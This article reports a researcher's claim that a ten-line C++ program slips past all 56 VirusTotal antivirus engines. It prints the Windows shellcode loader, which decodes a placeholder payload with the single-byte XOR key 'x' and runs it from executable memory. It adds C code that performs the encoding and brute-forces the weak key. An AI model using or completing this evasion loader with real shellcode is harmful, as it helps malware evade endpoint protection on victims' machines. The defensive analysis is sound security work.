Last week the information security specialist known by the nickname evasiv3 published a blog post describing how to get past any antivirus with ten lines of code.
Initially, evasiv3 planned to write a lengthy post about ways to bypass anti-virus protection; however, after testing the first step of his "manual" he was very surprised: none of the 56 products tested, all designed to keep the user safe online, detected his binary.

After obtaining such a result, I decided to abandon my idea of a long and exhausting tour of anti-virus protection and act quickly and "dirty", but in an incredibly simple way.
In his work, evasiv3 used Veil-Evasion, part of the Veil-Framework, which he describes as "an excellent tool that almost never let him down."
The code below is written in C++ and targets, first of all, the Windows platform:
```cpp
#include <windows.h>
#include <iostream>
#include <cstring>   // memcpy

int main(int argc, char **argv)
{
    // The payload, XORed byte-by-byte with the key 'x' before being pasted in,
    // e.g. 0x4C,0x4F,0x4C. The placeholder is left as in the original post.
    char b[] = {/* your XORd with key of 'x' shellcode goes here ie 0x4C,0x4F, 0x4C */};
    char c[sizeof b];

    // Decode b[] into c[]. sizeof (not strlen) is used throughout, so a 0x00
    // produced by the XOR does not truncate the buffer.
    for (size_t i = 0; i < sizeof b; i++) {
        c[i] = b[i] ^ 'x';
    }

    // Allocate a readable, writable and executable block, copy the decoded
    // payload into it, and jump to it.
    void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, c, sizeof c);
    ((void(*)())exec)();
}
```
The code above creates a character array holding the shellcode, XORs it with the "incredibly complex" lower-case key 'x', allocates a block of memory, copies the decoded array into it, and then executes it.
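The snippet shows only the decoder half and leaves the encoding step implicit. The following is an added example, written for this page and not taken from evasiv3's post or from Veil-Evasion: it performs the single-byte XOR encoding, prints the result in the initializer-list shape the snippet's `char b[]` expects, and then shows the defender's view of the "incredibly complex" key: with one byte of key there are only 256 candidates, so anyone with a guess at the first few plaintext bytes recovers it by brute force. The five-byte `SAMPLE` array is a constructed stand-in (nop, nop, nop, int3, ret), not working shellcode, and the function names are this example's own.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Single-byte XOR is its own inverse: the same routine encodes and decodes. */
size_t xor_bytes(const unsigned char *in, unsigned char *out, size_t n, unsigned char key)
{
    for (size_t i = 0; i < n; i++) {
        out[i] = (unsigned char)(in[i] ^ key);
    }
    return n;
}

/* Attacker's missing step: print the encoded bytes as a C initializer list,
 * in the shape the snippet above expects inside char b[] = { ... }. */
void emit_c_initializer(const unsigned char *buf, size_t n, FILE *out)
{
    for (size_t i = 0; i < n; i++) {
        fprintf(out, "0x%02X%s", buf[i], (i + 1 < n) ? "," : "");
        if ((i + 1) % 12 == 0 && i + 1 < n) {
            fputc('\n', out);
        }
    }
    fputc('\n', out);
}

/* Defender's side: a single-byte key has only 256 candidates. Given the
 * encoded blob and a guess at its first plen plaintext bytes (a known-plaintext
 * guess such as the usual first bytes of a common stager), try every key and
 * return the one that reproduces the prefix, or -1 if none does. */
int recover_single_byte_key(const unsigned char *enc, size_t n,
                            const unsigned char *known_prefix, size_t plen)
{
    if (plen == 0 || plen > n) {
        return -1;
    }
    for (int key = 0; key < 256; key++) {
        size_t i;
        for (i = 0; i < plen; i++) {
            if ((unsigned char)(enc[i] ^ key) != known_prefix[i]) {
                break;
            }
        }
        if (i == plen) {
            return key;
        }
    }
    return -1;
}

/* Constructed stand-in for a payload (nop, nop, nop, int3, ret). It exists
 * only for this demonstration and is not working shellcode. */
static const unsigned char SAMPLE[] = {0x90, 0x90, 0x90, 0xCC, 0xC3};
static const unsigned char SAMPLE_KEY = 'x';

/* Encode the sample, decode it again and report whether the bytes match. */
int sample_round_trip_ok(void)
{
    unsigned char enc[sizeof SAMPLE], dec[sizeof SAMPLE];
    xor_bytes(SAMPLE, enc, sizeof SAMPLE, SAMPLE_KEY);
    xor_bytes(enc, dec, sizeof enc, SAMPLE_KEY);
    return memcmp(SAMPLE, dec, sizeof SAMPLE) == 0;
}

/* Encode the sample, then recover the key using only its first three bytes. */
int sample_recovered_key(void)
{
    unsigned char enc[sizeof SAMPLE];
    xor_bytes(SAMPLE, enc, sizeof SAMPLE, SAMPLE_KEY);
    return recover_single_byte_key(enc, sizeof enc, SAMPLE, 3);
}

int main(void)
{
    unsigned char enc[sizeof SAMPLE];
    xor_bytes(SAMPLE, enc, sizeof SAMPLE, SAMPLE_KEY);

    printf("/* sample XORed with '%c', paste into char b[] */\n", SAMPLE_KEY);
    emit_c_initializer(enc, sizeof enc, stdout);

    printf("round trip: %s\n", sample_round_trip_ok() ? "ok" : "FAILED");
    int key = sample_recovered_key();
    printf("recovered key: %d", key);
    if (key >= 0) {
        printf(" ('%c')", key);
    }
    printf("\n");
    return 0;
}
```

The brute force is the point of the second half: the decoder loop in the snippet is what the 56 engines failed to flag, yet the encoding it undoes offers no secrecy at all, so the 0/56 result says more about how the scanners looked at the binary than about the strength of the obfuscation.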
If your reaction now is "oh, come on!", then it is the same as evasiv3's. The fact that the binary was detected by 0 of 56 antivirus engines when checked through VirusTotal adds fuel to the fire. The bypass shown above demonstrates that the simplest and most basic evasion technique still works.
Of course, most antivirus products are geared towards preventing the exploitation of vulnerabilities rather than identifying it, so it is too early to "bury" them.
The screenshot at the beginning of the article is dated 2015; however, the author of the code re-checked the binary on VirusTotal before publishing the post on his blog. The result was the same: 0 out of 56.